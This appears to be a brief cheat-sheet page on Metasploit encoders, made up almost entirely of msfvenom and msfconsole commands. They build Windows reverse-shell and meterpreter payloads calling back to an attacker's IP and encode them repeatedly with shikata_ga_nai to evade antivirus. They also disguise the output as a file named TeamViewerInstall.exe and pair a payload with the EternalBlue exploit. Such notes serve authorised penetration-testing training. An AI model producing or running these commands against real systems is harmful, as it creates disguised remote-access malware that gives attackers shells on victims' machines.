Encoders
About
Using Encoders
Non-Encoded Payload
[!bash!]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\xBadChars" -f perlEncoded Payload
[!bash!]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\xBadChars" -f perl -e x86/shikata_ga_naiEncoding a selected payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
msf6 exploit(windows/smb/ms17_010_eternalblue) > show encoders
# One single iteration
[!bash!]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacking-ip> LPORT=8080 -e <the-path-from-prev-command> -f exe -o ./TeamViewerInstall.exe
# Multiple encoding iterations
[!bash!]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacking-ip>> LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exeMSF - VirusTotal
Last updated